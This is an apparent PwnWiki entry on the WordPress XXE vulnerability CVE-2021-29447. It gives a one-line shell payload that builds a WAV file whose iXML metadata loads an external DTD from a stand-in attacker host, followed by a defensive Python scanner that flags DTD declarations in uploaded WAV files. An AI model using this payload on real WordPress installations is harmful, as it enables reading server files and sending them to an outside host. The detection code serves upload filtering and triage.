CVE-2021-29447 WordPress XXE Vulnerability

From PwnWiki
Revision as of 16:54, 6 May 2021 by Pwnwiki

Payload

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://attacker/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
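
For upload filtering and triage, the following added example (not part of the original page) walks the RIFF/WAVE chunk layout used by the payload above and reports any iXML chunk whose body carries a DTD declaration. The function names, the marker list and the sample files are assumptions constructed for illustration.

```python
import struct

# Legitimate iXML metadata has no need for a DTD, so either marker is a red flag.
DTD_MARKERS = (b"<!DOCTYPE", b"<!ENTITY")

def riff_chunks(data):
    """Yield (chunk_id, body) for each top-level chunk of a RIFF/WAVE file."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        return
    pos = 12
    while pos + 8 <= len(data):
        chunk_id = data[pos:pos + 4]
        (size,) = struct.unpack_from("<I", data, pos + 4)
        # The declared size may overrun the file; slicing clamps to what exists.
        yield chunk_id, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)  # chunk bodies are padded to even length

def ixml_dtd_findings(data):
    """Return the DTD markers found inside iXML chunks (empty list if none)."""
    findings = []
    for chunk_id, body in riff_chunks(data):
        if chunk_id != b"iXML":
            continue
        # Dropping NUL bytes lets the ASCII markers match UTF-16 text as well.
        flat = body.replace(b"\x00", b"")
        findings += [m.decode() for m in DTD_MARKERS if m in flat]
    return findings

def make_wav(chunks):
    """Build a constructed RIFF/WAVE sample from (chunk_id, body) pairs."""
    out = b"WAVE"
    for cid, body in chunks:
        out += cid + struct.pack("<I", len(body)) + body + b"\x00" * (len(body) & 1)
    return b"RIFF" + struct.pack("<I", len(out)) + out

# Constructed samples: plain metadata versus a DTD with an external entity.
FMT = struct.pack("<HHIIHH", 1, 1, 8000, 8000, 1, 8)
CLEAN = make_wav([(b"fmt ", FMT),
                  (b"iXML", b'<?xml version="1.0"?><BWFXML><NOTE>ok</NOTE></BWFXML>')])
SUSPECT = make_wav([(b"fmt ", FMT),
                    (b"iXML", b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % r '
                              b'SYSTEM "http://example.invalid/x.dtd">%r;]><x/>')])

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("suspect", SUSPECT)):
        print(name, ixml_dtd_findings(sample))
```

A non-empty result is a reason to reject or quarantine the upload before any media-metadata parser reads it.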